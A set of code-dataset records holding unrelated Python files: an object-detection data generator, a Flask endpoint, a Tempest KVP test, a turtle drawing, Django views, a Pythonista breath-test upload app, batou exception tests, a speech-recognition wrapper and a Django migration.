best_regr\n\n # we processed all the locations, check if any bbox has no anchor covered\n for idx in range(num_bbox):\n if bbox_num_pos_anchors[idx] == 0:\n if best_anchor_for_bbox[idx, 0] == -1:\n print('Warning: no overlap anchor for bbox {}'.format(idx))\n continue\n\n second_best_anchor_for_bbox = best_anchor_for_bbox[idx]\n fy = second_best_anchor_for_bbox[0],\n fx = second_best_anchor_for_bbox[1],\n idx_anchor_ratio = second_best_anchor_for_bbox[2],\n idx_anchor_size = second_best_anchor_for_bbox[3]\n\n idx_anchor = len(anchor_ratios) * idx_anchor_size + idx_anchor_ratio\n y_is_box_valid[fy, fx, idx_anchor] = 1\n y_rpn_overlap[fy, fx, idx_anchor] = 1\n start = 4 * idx_anchor\n y_rpn_regr[fy, fx, start:start + 4] = best_dx_for_bbox[idx, :]\n\n # now - each location has been marked and each bbox has been associated with an anchor\n # next, we will select a few negative sample ans the positive samples to form mini batch training samples\n # move the anchor-axis to the first dimension\n y_rpn_overlap = np.transpose(y_rpn_overlap, (2, 0, 1))\n y_rpn_overlap = np.expand_dims(y_rpn_overlap, axis=0) # 0-dimension is the batch dimension\n\n y_is_box_valid = np.transpose(y_is_box_valid, (2, 0, 1))\n y_is_box_valid = np.expand_dims(y_is_box_valid, axis=0)\n\n y_rpn_regr = np.transpose(y_rpn_regr, (2, 0, 1))\n y_rpn_regr = np.expand_dims(y_rpn_regr, axis=0)\n\n # return 3 sub arrays, the indexes of the element meet the condition\n pos_locs = np.where(np.logical_and(y_rpn_overlap[0, :, :, :] == 1, y_is_box_valid[0, :, :, :] == 1))\n neg_locs = np.where(np.logical_and(y_rpn_overlap[0, :, :, :] == 0, y_is_box_valid[0, :, :, :] == 1))\n\n num_positive_locs = len(pos_locs[0])\n num_negative_locs = len(neg_locs[0])\n\n # mute some positive box\n if num_positive_locs > num_region / 2:\n val_locs = random.sample(num_positive_locs, num_positive_locs - num_region / 2)\n y_is_box_valid[0, pos_locs[0][val_locs], pos_locs[1][val_locs], pos_locs[2][val_locs]] = 0\n num_positive_locs = num_region / 2\n\n # has more negative locations, then mute some negative anchors\n if num_negative_locs + num_positive_locs > num_region:\n val_locs = random.sample(range(num_negative_locs), num_negative_locs - num_positive_locs) # neg:pos = 1:1\n y_is_box_valid[0, neg_locs[0][val_locs], neg_locs[1][val_locs], neg_locs[2][val_locs]] = 0\n\n # y_rpn_cls shape: (1, 18, rows, cols), 1st dimension: is_box_valid, y_rpn_overlap for each anchor\n # merge them together, which will be used in computing loss.\n # y_true and y_pred is not 1 vs 1 mapping\n y_rpn_cls = np.concatenate([y_is_box_valid, y_rpn_overlap], axis=1)\n\n # y_rpn_regr shape: (1, 72, rows, cols)?\n y_rpn_regr = np.concatenate([np.repeat(y_rpn_overlap, 4, axis=1), y_rpn_regr], axis=1)\n\n return np.copy(y_rpn_cls), np.copy(y_rpn_regr)\n\n","sub_path":"frcnn/datagen.py","file_name":"datagen.py","file_ext":"py","file_size_in_byte":15827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"350769733","text":"from flask import Flask\nimport openpyxl as px\nimport pandas as pd\nimport itertools as it\nfrom flask import request\n\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef hello():\n args = request.args\n county = request.args.getlist('county')\n print(county)\n data = getData(county[0])\n return data.to_json()\n\ndef getData(county):\n print(county)\n wb = px.load_workbook('EARS_sample_index_dataset.xlsx')\n ws = wb['payout_monitoring_2016']\n data = ws.values\n cols = next(data)[1:]\n data = list(data)\n idx = [r[0] for r in data]\n data = (it.islice(r, 1, None) for r in data)\n df = pd.DataFrame(data, index=idx, columns=cols)\n df = df[df.index == county]\n output = df.PAYOUT\n return output\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"swissre/checkDrought/checkDrought.py","file_name":"checkDrought.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"147187641","text":"# Copyright 2014 Cloudbase Solutions Srl\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom tempest import config\nfrom oslo_log import log as logging\nfrom tempest.lis import manager\nfrom tempest.scenario import utils as test_utils\nfrom tempest import test\n\nCONF = config.CONF\n\nLOG = logging.getLogger(__name__)\n\n\nclass KVP(manager.LisBase):\n\n def setUp(self):\n super(KVP, self).setUp()\n # Setup image and flavor the test instance\n # Support both configured and injected values\n if not hasattr(self, 'image_ref'):\n self.image_ref = CONF.compute.image_ref\n if not hasattr(self, 'flavor_ref'):\n self.flavor_ref = CONF.compute.flavor_ref\n self.image_utils = test_utils.ImageUtils(self.manager)\n if not self.image_utils.is_flavor_enough(self.flavor_ref,\n self.image_ref):\n raise self.skipException(\n '{image} does not fit in {flavor}'.format(\n image=self.image_ref, flavor=self.flavor_ref\n )\n )\n self.host_name = \"\"\n self.instance_name = \"\"\n self.daemon = \"'[h]v_kvp_daemon\\|[h]ypervkvpd'\"\n self.run_ssh = CONF.validation.run_validation and \\\n self.image_utils.is_sshable_image(self.image_ref)\n self.ssh_user = CONF.validation.image_ssh_user\n LOG.debug('Starting test for i:{image}, f:{flavor}. '\n 'Run ssh: {ssh}, user: {ssh_user}'.format(\n image=self.image_ref, flavor=self.flavor_ref,\n ssh=self.run_ssh, ssh_user=self.ssh_user))\n\n @test.attr(type=['smoke', 'core', 'kvp'])\n @test.services('compute', 'network')\n def test_kvp_basic(self):\n self.spawn_vm()\n self._initiate_linux_client(self.floating_ip['floatingip']['floating_ip_address'],\n self.ssh_user, self.keypair['private_key'])\n self.verify_lis_status(self.instance_name, \"'Key-Value Pair Exchange'\")\n \"\"\" Check if KVP runs on the vm \"\"\"\n try:\n output = self.linux_client.verify_daemon(self.daemon)\n LOG.info('KVP daemon is running ${0}'.format(output))\n self.assertIsNotNone(output)\n except Exception:\n LOG.exception('KVP daemon ' + self.daemon + ' is not running!')\n self._log_console_output()\n raise\n self.check_kvp_basic(self.instance_name)\n self.servers_client.delete_server(self.instance['id'])\n\n @test.attr(type=['smoke', 'core', 'kvp'])\n @test.services('compute', 'network')\n def test_kvp_Key_Values(self):\n self.spawn_vm()\n self._initiate_linux_client(self.floating_ip['floatingip']['floating_ip_address'],\n self.ssh_user, self.keypair['private_key'])\n self.verify_lis_status(self.instance_name, \"'Key-Value Pair Exchange'\")\n self.send_kvp_client()\n self.kvp_add_value(self.instance_name, 'EEE', '555', '0')\n self.linux_client.kvp_verify_value('EEE', '555', '0')\n self.kvp_modify_value(self.instance_name, 'EEE', '999', '0')\n self.linux_client.kvp_verify_value('EEE', '999', '0')\n self.kvp_remove_value(self.instance_name, 'EEE', '999', '0')\n self.servers_client.delete_server(self.instance['id'])\n","sub_path":"tempest/lis/core/test_kvp.py","file_name":"test_kvp.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"232657091","text":"\"\"\"\n Author: Chris Johnson, cxj9051\n\"\"\"\n\nfrom turtle import *\n\n\ndef initiate():\n \"\"\"\n Pre-Conditions: The pen is down, facing east, at the position 300, 300.\n The initiate function makes the turtle move faster and sets the screen to the dimensions 600, 600. It also puts the turtle in the middle of the screen.\n Post-Conditions: The pen is down, facing east, at the position 300, 300.\n \"\"\"\n speed(0)\n setup(width=600, height=600, startx=300, starty=300)\n\ndef main():\n \"\"\"\n Pre-Conditions: The pen is down, facing east, at the position 300, 300.\n The main function calls the initiate function, prompts the user for the depth, then passes on the depth and size to the drawJester function.\n Once the drawJester function is done, it closes exits the program\n Post-Conditions: The pen is down, facing east, at the position 300, 300.\n \"\"\"\n initiate()\n depth = int(input(\"What would you like the depth to be? \"))\n size = 100\n drawJester(depth, size)\n input(\"Press enter to continue \")\n bye()\n\ndef drawJester(depth, size):\n \"\"\"\n Pre-Conditions: The pen is down, facing east, at the position 300, 300.\n The turtle then draws squares recursively where the amount of squares drawn is defined by the depth variable. Once the squares are drawn, circles are drawn at the corner of the last sqaures.\n Post-Conditions: The pen is down, facing east, at the position 300, 300.\n \"\"\"\n if depth % 2 == 0:\n color(\"red\")\n else:\n color(\"green\")\n if depth == 0:\n circle(size / 2)\n else:\n fd(size / 2)\n left(90)\n fd(size)\n right(135)\n drawJester(depth - 1, size / 2)\n if depth % 2 == 0:\n color(\"red\")\n else:\n color(\"green\")\n left(225)\n fd(size)\n right(135)\n drawJester(depth - 1, size / 2)\n if depth % 2 == 0:\n color(\"red\")\n else:\n color(\"green\")\n left(225)\n fd(size)\n left(90)\n fd(size / 2)\n\n \n \n \n\n\nmain()\n","sub_path":"Homeworks/jester.py","file_name":"jester.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"415055536","text":"from django.shortcuts import render\nfrom django.http import HttpResponseNotFound, HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import Pages\n\n# creamos el formulario a parte\n#https://www.w3schools.com/tags/att_form_method.asp\nFORMULARIO = \"\"\"\n\t
\n\tURL:
\n\tFirst name:
\n\tLast name:
\n\t\n\t
\n\"\"\"\ndef pages (request,num):\n\n\ttry:\n\t\tpage = Pages.objects.get(id = str(num))\t\n\texcept Pages.DoesNotExist:\n\t\treturn HttpResponseNotFound('

' + num + 'not found

')\n\treturn HttpResponse(page.name + str(page.page))\n\t\n@csrf_exempt\ndef barra (request):\n\n\tif request.method == \"POST\":\n\t\tpage = Pages (name = request.POST['name'], page = request.POST['pages'])\n\t\tpage.save()\n\tlista = Pages.objects.all()\n\trespuesta = \"\"\n\t\n\t# if request.user.is_authenticated():\n # print(\"Logged in\")\n #else:\n # print(\"Not logged in\")\n\t\n\tif request.user.is_authenticated():\n\t#https://stackoverflow.com/questions/12209438/logout-button-php/12209491\n\t\tlogged = 'Logged in' + request.user.username + 'Logout'\n\t\trespuesta = '

' + logged + FORMULARIO + \"

\" + respuesta + \"

\"\n\telse:\n\t#https://www.quora.com/How-does-one-link-login-php-and-register-php-in-index-phps-html-code\n\t\tlogged = 'Not logged in Login'\n\t\trespuesta = '

' + logged + \"

\" + respuesta + \"

\"\n\treturn HttpResponse(respuesta)\n","sub_path":"myproject/cms_user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"355050006","text":"DEBUG = False\n\n## Python imports\nimport os\nimport requests\nimport shutil\nimport numpy as np\nfrom io import BytesIO\nimport datetime as datetime\nimport time\nfrom pytz import timezone\nimport json\nimport threading\nimport fnmatch\nimport pprint\nimport math\nfrom functools import partial\nimport itertools\nimport matplotlib.pyplot as plt\nfrom matplotlib.dates import num2date, date2num, num2epoch\n\n# Pythonista imports\nimport ui\nimport Image\nimport console\nfrom objc_util import on_main_thread\nimport scene\n\n\n# Metre imports\nimport process_test\nfrom ble_file_uploader import BleUploader\nfrom lib.UISummaryDelegate import SummaryDelegate\nfrom lib.UIBleDelegate import BleDelegate, BokehDelegate, loading_html, updating_html, nolog_html, getPlot\nfrom lib.UIHelpDelegate import HelpDelegate\nfrom lib.UIFeatures import ConsoleAlert\nfrom lib.UITableDelegate import ResultsTable\nfrom app_single_launch import AppSingleLaunch\n\n# Using single launch lock as suggested in\n# https://forum.omz-software.com/topic/5440/prevent-duplicate-launch-from-shortcut/7\n\nAPP_VERSION = 'v0.23'\n\n\n\nclass MainView(ui.View):\n def __init__(self):\n #def __init__(self, app: AppSingleLaunch):\n #self.app = app\n self.name = \"MetreAce Home\"\n self.flex = 'WH'\n #self.tint_color = '#494949'\n if DEBUG:\n print('Screen size')\n print(scene.get_screen_size())\n self.view_x = scene.get_screen_size()[0]\n self.view_y = scene.get_screen_size()[1]\n \n\n \n # Setup of UI Features\n \n self.v = ui.load_view('mainview')\n self.v.frame = self.bounds\n self.v.flex = 'WH'\n \n self.xscaler = self.view_x/320\n self.yscaler = self.view_y/480\n\n \n # Console\n self.app_console = self.v['console']\n self.app_console.alpha = 0\n #self.orig_console_loc = self.app_console.y\n \n # Ble connection\n self.star_button = self.v['start_button']\n self.ble_icon = self.v['ble_icon']\n self.ble_status_icon = self.v['ble_status_icon']\n self.ble_status = self.v['ble_status']\n self.connect_button = self.v['connect_button']\n ble_icon_path = 'images/ble_off.png'\n self.ble_status_icon.image = ui.Image.named(ble_icon_path)\n \n # Set up icons\n self.instr_icon = self.v['imageview']\n dev_icon_path = 'images/MetreAceDev.png'\n self.instr_icon.image = ui.Image.named(dev_icon_path)\n self.calc_icon = self.v['button1']\n\n # Instr chevrons\n self.d0 = self.v['dot0']\n self.d1 = self.v['dot1']\n self.d2 = self.v['dot2']\n self.d3 = self.v['dot3']\n self.d4 = self.v['dot4'] \n \n # Cloud chevrons\n self.d5 = self.v['dot5']\n self.d6 = self.v['dot6']\n self.d7 = self.v['dot7']\n self.d8 = self.v['dot8']\n self.d9 = self.v['dot9']\n \n # Version label\n self.vlabel = self.v['vlabel']\n self.vlabel.text = APP_VERSION\n \n #Center app title based on bounds\n M_w =self.v['etre'].x - self.v['M'].x\n etre_w = self.v['A'].x - self.v['etre'].x\n A_w = self.v['ce'].x - self.v['A'].x\n \n self.v['etre'].x = self.star_button.x * self.xscaler + M_w * self.xscaler\n self.v['M'].x = self.v['etre'].x - M_w\n self.v['A'].x = self.v['etre'].x + etre_w \n self.v['ce'].x = self.v['A'].x + A_w\n \n # Setup\n self.cwd = os.getcwd()\n on_main_thread(console.set_idle_timer_disabled)(True)\n \n \n root_dir, metre_dir = self.cwd.split('MetreiOS')\n if DEBUG:\n print('This is self.cwd: ' + self.cwd)\n print('This is root_dir: ' + root_dir)\n \n # Download Single Launch Lock if it's not already installed\n check_path = root_dir + 'site-packages/single_launch.lock'\n if os.path.exists(check_path):\n if DEBUG:\n print('single_launch.lock already exists')\n else:\n print('')\n else:\n shutil.copy(self.cwd + '/resources/single_launch.lock', check_path )\n if DEBUG:\n print('moved copy of single_launch.lock')\n else:\n print('')\n\n\n # Set up UI Functions\n self.getData()\n self.results_table = self.v['results_table']\n self.orig_results_table_loc = self.results_table.y\n\n if self.xscaler > 2:\n self.results_table.width = self.results_table.width/(self.xscaler/2)\n self.results_table.x = self.star_button.x/2 + self.results_table.width/(4*2) - self.star_button.width/8\n\n self.restable_inst = ResultsTable(self.v, self.results_table, self.xscaler, self.yscaler, self.cwd)\n self.add_subview(self.v)\n \n # Implementation of navigation view/mainview\n self.l = self.create_l_buttonItems('Settings','|','Results','|', 'Help')\n self.left_button_items = self.l\n self.files_to_upload = os.listdir(self.cwd + '/data_files/converted_files/')\n\n # Process pre-uploaded tests (if available)\n\n \n def init_check(self):\n if DEBUG:\n print(\"this is the size of files to upload\")\n print(len(self.files_to_upload))\n if len(self.files_to_upload) >=2: \n \n self.app_console.text = 'Beginning Upload'\n self.main()\n self.star_button.alpha = 0.5\n self.ble_status.text = ''\n else:\n self.ble_status.text = 'Ready to Connect'\n self.bleStatus()\n \n def will_close(self) -> None:\n self.app.will_close()\n\n # This sets up main navigation view\n\n def button_nav(self, sender):\n def connect(a,b):\n \n if sender.title == a:\n view_to_push = b\n pushed_view = ui.load_view(view_to_push)\n self.v.navigation_view.push_view(pushed_view)\n \n if sender.title=='Settings':\n settings_page = pushed_view['view1']\n d_table = settings_page['dt_table']\n ble_delegate = BleDelegate(settings_page, d_table, self.cwd)\n \n if sender.title=='Results':\n results_page = pushed_view['bokeh_bg']\n bview = ui.load_view('bokehview') \n bokeh_delegate = BokehDelegate(pushed_view['webview1'], self.cwd)\n\n if sender.title =='Help':\n help_page = pushed_view['toolbarview']\n hview = ui.load_view('toolbar')\n inst_page = pushed_view['online_instructions']\n qa_page = pushed_view['online_qa']\n recover_page = pushed_view['recover_button']\n help_delegate = HelpDelegate(hview, inst_page, qa_page, recover_page)\n\n \n connect('Settings','file_view')\n connect('Help','toolbar')\n connect('Results','bokehview')\n\n\n def create_l_buttonItems(self, *buttons):\n items=[]\n for b in buttons:\n b=ui.ButtonItem(b)\n b.tint_color='#494949'\n b.action= self.button_nav\n items.append(b)\n return items\n\n# This sets up the bluetooth upload\n @ui.in_background\n def bleStatus(self):\n self.star_button.alpha = 0.5\n loaded = False\n self.connect_button.alpha = 0\n ble_icon_path = 'images/ble_disconnected.png'\n self.ble_status_icon.image = ui.Image.named(ble_icon_path)\n \n if not loaded:\n self.ble_status.text= 'Ready to Connect'\n ble_file_uploader = BleUploader(self.app_console, self.ble_status_icon, self.v, self.xscaler, self.yscaler, APP_VERSION, DEBUG)\n ready_status, orig_table_loc = ble_file_uploader.execute_transfer()\n self.orig_results_table_loc = orig_table_loc\n \n if ready_status:\n done = True\n #self.star_button.alpha = 0.25\n self.ble_status.text = ''\n\n # HERE is where you trigger the main function (i.e. after the button is pushed)\n self.calc_icon.alpha = 0.7\n \n self.main(direct = False)\n #self.connect_button.alpha = 0.7\n #self.star_button.alpha = 0.7\n return done\n else:\n self.app_console.text = 'No breath tests are ready to be processed'\n if ble_file_uploader.py_ble_uart.peripheral:\n ble_file_uploader.py_ble_uart.peripheral = False\n self.ble_icon_path = 'images/ble_off.png'\n self.ble_status_icon.image = ui.Image.named(ble_icon_path)\n self.ble_status.text= 'Ready to Connect'\n self.star_button.alpha = 0.7\n self.connect_button.action = self.bleStatus()\n else:\n if DEBUG:\n print(\"UI senses it is disconnected\")\n time.sleep(0.5)\n self.app_console.text = 'Bluetooth connection lost. Reinsert mouthpiece to try again'\n ble_icon_path = 'images/ble_off.png'\n self.ble_status_icon.image = ui.Image.named(ble_icon_path)\n self.ble_status_icon.background_color = 'black'\n self.ble_status.text= 'Ready to Connect'\n self.star_button.alpha = 0.7\n self.connect_button.action = self.bleStatus()\n \n ### THIS IS WHERE YOU SHOULD GIVE THE OPTION TO CONNECT AGAIN\n self.d0.alpha = 0 \n self.d1.alpha = 0\n self.d2.alpha = 0\n self.d3.alpha = 0\n self.d4.alpha = 0 \n self.d5.alpha = 0 \n self.d6.alpha = 0\n self.d7.alpha = 0\n self.d8.alpha = 0\n self.d9.alpha = 0\n self.instr_icon.alpha = 0.1\n self.connect_button.action = self.bleStatus()\n self.connect_button.alpha =1\n # if self.app_console.y != self.orig_console_loc:\n # self.app_console.y = self.orig_console_loc\n\n \n else:\n self.ble_icon_path = 'images/ble_disconnected.png'\n ble_icon.image = ui.Image.named(ble_icon_path)\n # if self.app_console.y != self.orig_console_loc:\n # self.app_console.y = self.orig_console_loc\n return done\n \n \n \n def getData(self):\n \n with open(self.cwd + '/log/log_003.json') as json_file:\n self.log = json.load(json_file)\n self.etime = []\n self.weektime = []\n for val in self.log['Etime']:\n tval = datetime.datetime.fromtimestamp(int(val))\n year, weeknum = tval.strftime(\"%Y-%U\").split('-')\n weekcalc = str(year) + '-W' + str(weeknum)\n day_of_week = datetime.datetime.strptime(weekcalc + '-1', \"%Y-W%W-%w\")\n self.weektime.append(day_of_week)\n self.etime.append(tval)\n self.acetone = np.array(self.log['Acetone'])\n dtDateTime = []\n for i in range(0, len(self.log['DateTime'])):\n dtDateTime.append(datetime.datetime.strptime(self.log['DateTime'][i], '%Y-%m-%d %H:%M:%S'))\n vectorized = []\n \n for i in range(0, len(self.acetone)):\n vectorized.append([self.weektime[i], self.acetone[i], dtDateTime[i]])\n self.varray = np.array(vectorized)\n if len(self.acetone) <=0:\n self.varray = []\n try:\n self.notes = self.log['Notes']\n except:\n self.notes = []\n for i in range(0, len(self.log['Acetone'])):\n self.notes.append('')\n self.log['Notes'] = self.notes\n try:\n self.keys = self.log['Key']\n except:\n self.keys = []\n for i in range(0, len(self.log['Acetone'])):\n self.keys.append('')\n self.log['Notes'] = self.notes\n self.log['Key'] = self.keys\n with open(self.cwd + \"/log/log_003.json\", \"w\") as outfile:\n json.dump(self.log, outfile) \n ########################################\n def blink(self): \n if self.d5.alpha == 0.75:\n self.d6.alpha= 0.75\n self.d7.alpha= 0\n self.d8.alpha= 0\n self.d9.alpha= 0\n self.d5.alpha= 0\n elif self.d6.alpha == 0.75:\n self.d7.alpha= 0.75\n self.d8.alpha= 0\n self.d9.alpha= 0\n self.d5.alpha= 0\n self.d6.alpha= 0\n elif self.d7.alpha == 0.75:\n self.d8.alpha= 0.75\n self.d9.alpha= 0\n self.d5.alpha= 0\n self.d6.alpha= 0\n self.d7.alpha= 0\n elif self.d8.alpha == 0.75:\n self.d9.alpha= 0.75\n self.d5.alpha= 0\n self.d6.alpha= 0\n self.d7.alpha= 0\n self.d8.alpha= 0 \n elif self.d9.alpha == 0.75:\n self.d5.alpha= 0.75\n self.d6.alpha= 0\n self.d7.alpha= 0\n self.d8.alpha= 0\n self.d9.alpha= 0 \n \n def main(self, direct = True):\n\n self.ble_status.alpha = 0.75 \n \n self.star_button.alpha = 0.75\n self.calc_icon.alpha = 0.75\n if direct:\n fixed_loc = self.results_table.y\n else:\n fixed_loc = self.orig_results_table_loc\n global process_done\n process_done = False\n \n def animate_bar():\n for i in range(0, 200):\n if process_done:\n break\n ui.animate(self.blink, 0.1)\n if DEBUG: print(i)\n time.sleep(0.2)\n\n \n source_path = self.cwd + '/data_files/converted_files/'\n all_src_files = os.listdir(source_path)\n files = []\n for file in all_src_files:\n if \".gitkeep\" not in file:\n files.append(file)\n if DEBUG:\n print(\"these are the files in converted_files: \" + str(files))\n numOfFiles = len(files)\n self.app_console.alpha = 1\n if numOfFiles >1:\n if self.results_table.y == fixed_loc: \n self.results_table.y = self.results_table.y/(2*self.xscaler) + self.app_console.height/2\n self.app_console.text = str(numOfFiles) + ' breath tests are ready to be processed. Beginning data processing...'\n self.d5.alpha = 0.75\n elif numOfFiles == 1:\n if self.results_table.y == fixed_loc: \n self.results_table.y = self.results_table.y/(2*self.xscaler) + self.app_console.height/2\n print('moving to ' + str(self.results_table.y))\n\n self.app_console.text = '1 breath test is ready to be processed. Beginning data processing...'\n self.d5.alpha = 0.75\n else:\n self.app_console.text = 'No breath tests are ready to be processed at this time'\n time.sleep(3)\n \n try:\n with open(self.cwd + '/log/timezone_settings.json') as f:\n tzsource = json.loads(f)\n tz = 'US/Pacific'\n \n \n except:\n tz = 'US/Pacific'\n \n for file in files:\n if fnmatch.fnmatch(file, '*.json'):\n\n dt = datetime.datetime.fromtimestamp(int(file.split('-')[0])).astimezone(timezone(tz)).strftime('%b %d, %Y, %I:%M %p')\n ui.animate(self.blink, 0.1)\n if DEBUG:\n print('Beginning Analysis of test from ' + dt)\n json_path = source_path + '/'+ file\n process_done = False\n with open(json_path) as f:\n data_dict = json.load(f)\n try:\n\n data_dict_to_send = process_test.process(data_dict, dt, DEBUG)\n url = 'https://us-central1-metre3-1600021174892.cloudfunctions.net/metre-7500'\n data_dict_to_send['App_Version'] = APP_VERSION\n json_text = json.dumps(data_dict_to_send)\n self.app_console.text = 'Uploading and interpreting results from test from your ' + dt +' test. This may take a few moments...'\n pt = threading.Thread(target = animate_bar) # don't do this unless u start a parallel thread to send request\n pt.start()\n if DEBUG:\n print('sending to cloud')\n start = time.time()\n response = requests.post(url, files = [('json_file', ('test.json', json_text, 'application/json'))])\n process_done = True\n elapsedtime = time.time()-start\n if DEBUG: \n print('received response--response time ' + str(elapsedtime))\n response_json = json.loads(response.text)\n pt.join()\n process_done = True\n self.app_console.text = 'Results from ' + dt + ': ' + response_json['pred_content']\n if DEBUG:\n print(response_json['pred_content'])\n print(response_json)\n newlog = {'Etime': response_json['refnum'],\n 'DateTime': response_json['DateTime'],\n 'Acetone': float(response_json['Acetone']),\n 'Sensor': response_json['sensor'],\n 'Instr': response_json['instrument'],\n 'Notes': '',\n 'Key': ''}\n for key, value in self.log.items():\n self.log[key].append(newlog[key])\n with open(self.cwd + \"/log/log_003.json\", \"w\") as outfile:\n json.dump(self.log, outfile)\n self.getData()\n if DEBUG:\n print(self.acetone)\n self.results_table = self.v['results_table']\n self.restable_inst.update_table() \n except:\n self.app_console.text = 'The test from ' + dt + ' could not be processed.'\n time.sleep(1)\n shutil.move(source_path + file, self.cwd +'/data_files/processed_files/' + file)\n else:\n continue\n time.sleep(1)\n \n self.getData()\n self.restable_inst.update_table() \n self.d5.alpha = 0\n self.d6.alpha = 0\n self.d7.alpha = 0\n self.d8.alpha = 0\n self.d9.alpha = 0\n self.calc_icon.alpha = 0.2\n \n self.app_console.text = 'Test Processing and Upload Complete.'\n time.sleep(2.5)\n self.app_console.alpha = 0\n self.app_console.text = ''\n\n if self.results_table.y != fixed_loc:\n self.results_table.y = fixed_loc\n self.connect_button.action = self.bleStatus()\n self.ble_status.alpha = 1\n \n \n #self.ble_status.text = 'CONNECT'\n\n\nclass NavView(ui.View):\n def __init__(self, app: AppSingleLaunch):\n self.app = app\n self.tint_color = '#494949' \n self.name = \"MetreAce Nav\"\n self.flex = 'WH'\n self.mainscript = MainView()\n self.nav = ui.NavigationView(self.mainscript)\n\n \n\nif __name__ == '__main__':\n app = AppSingleLaunch(\"MetreAce Nav\")\n if not app.is_active():\n nav_class = NavView(app)\n nav_view = nav_class.nav\n nav_view.tint_color = '#494949' \n app.will_present(nav_view)\n nav_view.present()\n nav_class.mainscript.init_check()\n self.connect_button.action = self.bleStatus()\n self.ble_status.alpha = 1\n\n","sub_path":"MetreUI.py","file_name":"MetreUI.py","file_ext":"py","file_size_in_byte":20452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"609026285","text":"from batou import ConfigurationError, ConversionError\nfrom batou import MissingOverrideAttributes, DuplicateComponent\nfrom batou import UnknownComponentConfigurationError, UnusedResources\nfrom batou import UnsatisfiedResources, MissingEnvironment\nfrom batou import ComponentLoadingError, MissingComponent, SuperfluousSection\nfrom batou import SuperfluousComponentSection, SuperfluousSecretsSection\nfrom batou import CycleErrorDetected, NonConvergingWorkingSet\nfrom batou import DuplicateHostError, InvalidIPAddressError\n\nfrom batou.component import ComponentDefinition\nimport sys\n\n\ndef test_configurationerrors_can_be_sorted(root):\n errors = []\n errors.append(ConfigurationError(\"asdffdas\", root.component))\n errors.append(\n ConversionError(root.component, \"testkey\", \"testvalue\", str, \"foobar\"))\n errors.append(MissingOverrideAttributes(root.component, [\"asdf\", \"bsdfg\"]))\n\n errors.append(\n DuplicateComponent(\n ComponentDefinition(root.component.__class__, \"asdf.py\"),\n ComponentDefinition(root.component.__class__, \"bsdf.py\"),\n ))\n\n try:\n raise ValueError(\"asdf\")\n except Exception:\n _, exc_value, exc_traceback = sys.exc_info()\n\n errors.append(\n UnknownComponentConfigurationError(root, exc_value, exc_traceback))\n\n errors.append(UnusedResources({\"asdf\": [(root.component, 1)]}))\n\n errors.append(UnsatisfiedResources({\"asdf\": [root]}))\n\n errors.append(MissingEnvironment(root.environment))\n\n errors.append(ComponentLoadingError(\"asdf.py\", ValueError(\"asdf\")))\n\n errors.append(MissingComponent(\"component\", \"hostname\"))\n\n errors.append(SuperfluousSection(\"asdf\"))\n\n errors.append(SuperfluousComponentSection(\"asdf\"))\n\n errors.append(SuperfluousSecretsSection(\"asdf\"))\n\n errors.append(CycleErrorDetected(\"foo\"))\n\n errors.append(NonConvergingWorkingSet([root]))\n\n errors.append(DuplicateHostError(\"asdf\"))\n\n errors.append(InvalidIPAddressError((\"127.0.0.256/24\")))\n\n errors.sort(key=lambda x: x.sort_key)\n","sub_path":"src/batou/tests/test_exceptions.py","file_name":"test_exceptions.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"251251541","text":"import sys\nimport io\nsys.path.append('..')\nimport SpeechRecognition.speech_recognition_wrapper\nimport RecordingPackage.speech_recognition_recording\n\nclass MyModel():\n def __init__(self,vc):\n self.vc = vc\n self.users_database = {}\n\n def record_user(self):\n \"\"\"\n this method records user\n :return:\n \"\"\"\n self.AudioData, self.recorded_text = SpeechRecognition.speech_recognition_wrapper.record_and_recognize(self.vc)\n self.flac = io.BytesIO(self.AudioData.get_flac_data())\n\n def register_user(self, name=None, audiodata = None, flac = None):\n \"\"\"\n this registers the user, with no arguments passed registers the last recorded user\n :return:\n \"\"\"\n if name == None:\n name = self.recorded_text\n if audiodata == None:\n audiodata = self.AudioData\n if flac == None:\n flac = self.flac\n self.users_database[name] = {\"name\": name, \"AudioData\": audiodata,\n \"flac\": flac,\n \"NumpyArray\":\n RecordingPackage.speech_recognition_recording.convert_AudioData_to_Numpy_array_and_fs(\n audiodata)['NumpyArray'],\n \"fs\":\n RecordingPackage.speech_recognition_recording.convert_AudioData_to_Numpy_array_and_fs(\n audiodata)['fs']}\n print(self.users_database)","sub_path":"AplikacjaTestowa/ProgramLogic/MyModel.py","file_name":"MyModel.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"199078407","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('schedules', '0002_auto_20160410_1304'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='schedulebody',\n name='schedule_date',\n field=models.DateField(verbose_name='\\u751f\\u7522\\u65e5\\u671f', db_column=b'MDATE'),\n ),\n migrations.AlterField(\n model_name='scheduleheader',\n name='schedule_date',\n 